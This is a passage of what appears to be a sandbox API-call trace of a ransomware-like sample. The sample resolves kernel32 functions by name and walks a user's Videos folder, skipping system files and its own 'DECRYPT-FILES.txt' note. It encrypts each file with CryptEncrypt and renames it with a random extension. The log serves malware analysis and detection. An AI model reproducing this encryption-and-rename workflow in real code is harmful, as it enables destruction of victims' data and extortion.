lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0087.695] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0087.695] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0087.695] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0087.695] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0087.695] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0087.695] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0087.695] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0087.695] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0087.695] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0087.695] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0087.695] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0087.695] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0087.695] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0087.695] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0087.695] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0087.695] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0087.696] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0087.696] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\XgwIp2mS.mkv") returned 66 [0087.696] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\XgwIp2mS.mkv.vIqcZ") returned 72 [0087.696] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\XgwIp2mS.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\xgwip2ms.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\XgwIp2mS.mkv.vIqcZ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\xgwip2ms.mkv.viqcz"), dwFlags=0x0) returned 1 [0087.696] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.697] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.697] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.697] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x796154a0, ftCreationTime.dwHighDateTime=0x1d4c977, ftLastAccessTime.dwLowDateTime=0x14105f90, ftLastAccessTime.dwHighDateTime=0x1d4cb95, ftLastWriteTime.dwLowDateTime=0x14105f90, ftLastWriteTime.dwHighDateTime=0x1d4cb95, nFileSizeHigh=0x0, nFileSizeLow=0x151a, dwReserved0=0x0, dwReserved1=0x0, cFileName="z2fHcKc4CW0Oah1eKV.avi", cAlternateFileName="Z2FHCK~1.AVI")) returned 1 [0087.697] lstrcmpiW (lpString1="z2fHcKc4CW0Oah1eKV.avi", lpString2="DECRYPT-FILES.txt") returned 1 [0087.697] lstrcmpiW (lpString1="z2fHcKc4CW0Oah1eKV.avi", lpString2="autorun.inf") returned 1 [0087.697] lstrcmpiW (lpString1="z2fHcKc4CW0Oah1eKV.avi", lpString2="boot.ini") returned 1 [0087.697] lstrcmpiW (lpString1="z2fHcKc4CW0Oah1eKV.avi", lpString2="desktop.ini") returned 1 [0087.697] lstrcmpiW (lpString1="z2fHcKc4CW0Oah1eKV.avi", lpString2="ntuser.dat") returned 1 [0087.697] lstrcmpiW (lpString1="z2fHcKc4CW0Oah1eKV.avi", lpString2="iconcache.db") returned 1 [0087.697] lstrcmpiW (lpString1="z2fHcKc4CW0Oah1eKV.avi", lpString2="bootsect.bak") returned 1 [0087.697] lstrcmpiW (lpString1="z2fHcKc4CW0Oah1eKV.avi", lpString2="ntuser.dat.log") returned 1 [0087.697] lstrcmpiW (lpString1="z2fHcKc4CW0Oah1eKV.avi", lpString2="thumbs.db") returned 1 [0087.697] lstrcmpiW (lpString1="z2fHcKc4CW0Oah1eKV.avi", lpString2="Bootfont.bin") returned 1 [0087.697] lstrlenW (lpString="z2fHcKc4CW0Oah1eKV.avi") returned 22 [0087.697] lstrcmpiW (lpString1="avi", lpString2="lnk") returned -1 [0087.697] lstrcmpiW (lpString1="avi", lpString2="exe") returned -1 [0087.697] lstrcmpiW (lpString1="avi", lpString2="sys") returned -1 [0087.697] lstrcmpiW (lpString1="avi", lpString2="dll") returned -1 [0087.697] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0087.697] lstrlenW (lpString="z2fHcKc4CW0Oah1eKV.avi") returned 22 [0087.698] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0087.698] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="z2fHcKc4CW0Oah1eKV.avi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\z2fHcKc4CW0Oah1eKV.avi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\z2fHcKc4CW0Oah1eKV.avi" [0087.698] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.698] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\z2fHcKc4CW0Oah1eKV.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\z2fhckc4cw0oah1ekv.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0087.698] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=5402) returned 1 [0087.698] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0087.698] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0087.698] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0087.698] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0087.698] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.699] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0087.699] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0087.699] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.700] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0087.700] CloseHandle (hObject=0x42c) returned 1 [0087.700] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.700] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0087.701] CloseHandle (hObject=0x0) returned 0 [0087.701] CloseHandle (hObject=0x428) returned 1 [0087.701] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.702] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.702] GetTickCount () returned 0x114e5ec [0087.702] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.702] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0087.702] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0087.702] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.703] lstrlenA (lpString="kernel32.dll") returned 12 [0087.703] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0087.703] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0087.703] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0087.703] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0087.703] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0087.703] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0087.703] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0087.703] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0087.703] lstrlenA (lpString="ADDATOMA") returned 8 [0087.703] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0087.703] lstrlenA (lpString="ADDATOMW") returned 8 [0087.703] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0087.703] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0087.703] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0087.703] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0087.703] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0087.703] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0087.703] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0087.703] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0087.703] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0087.703] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0087.703] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0087.703] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0087.703] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0087.703] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0087.703] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0087.703] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0087.703] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0087.703] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0087.703] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0087.703] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0087.704] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0087.704] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0087.704] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0087.704] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0087.704] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0087.704] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0087.704] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0087.704] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0087.704] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0087.704] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0087.704] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0087.704] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0087.704] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0087.704] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0087.704] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0087.704] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0087.704] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0087.704] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0087.704] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0087.704] lstrlenA (lpString="BACKUPREAD") returned 10 [0087.704] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0087.704] lstrlenA (lpString="BACKUPSEEK") returned 10 [0087.704] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0087.704] lstrlenA (lpString="BACKUPWRITE") returned 11 [0087.704] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0087.704] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0087.704] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0087.704] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0087.704] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0087.704] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0087.704] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0087.704] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0087.704] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0087.704] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0087.704] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0087.704] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0087.704] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0087.705] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0087.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0087.705] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0087.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0087.705] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0087.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0087.705] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0087.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0087.705] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0087.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0087.705] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0087.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0087.705] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0087.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0087.705] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0087.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0087.705] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0087.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0087.705] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0087.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0087.705] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0087.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0087.705] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0087.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0087.705] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0087.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0087.705] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0087.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0087.705] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0087.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0087.705] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0087.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0087.705] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0087.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0087.705] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0087.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0087.705] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0087.705] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0087.706] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0087.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0087.706] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0087.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0087.706] lstrlenA (lpString="BEEP") returned 4 [0087.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0087.706] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0087.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0087.706] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0087.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0087.706] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0087.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0087.706] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0087.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0087.706] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0087.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0087.706] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0087.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0087.706] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0087.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0087.706] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0087.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0087.706] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0087.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0087.706] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0087.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0087.706] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0087.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0087.706] lstrlenA (lpString="CANCELIO") returned 8 [0087.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0087.706] lstrlenA (lpString="CANCELIOEX") returned 10 [0087.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0087.706] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0087.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0087.706] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0087.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0087.706] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0087.706] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0087.707] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0087.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0087.707] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0087.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0087.707] lstrlenA (lpString="CHECKELEVATION") returned 14 [0087.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0087.707] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0087.707] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0087.707] 